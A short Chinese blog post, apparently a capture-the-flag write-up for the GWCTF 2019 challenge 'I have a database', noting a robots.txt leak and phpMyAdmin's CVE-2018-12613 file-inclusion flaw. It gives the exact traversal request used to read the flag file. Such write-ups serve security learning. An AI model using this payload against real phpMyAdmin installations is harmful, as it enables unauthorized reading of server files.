web | [GWCTF 2019]我有一个数据库
[GWCTF 2019]我有一个数据库
信息泄露,存在robots.txt。
然后发现存在phpmyadmin,可以实现任意文件读取(CVE-2018-12613(phpmyadmin远程文件包含漏洞)):
phpmyadmin/index.php?target=db_datadict.php?/../../../../../flag
直接get flag。
本文来自博客园,作者:Mz1,转载请注明原文链接:https://www.cnblogs.com/Mz1-rc/p/15543266.html
如果有问题可以在下方评论或者email:mzi_mzi@163.com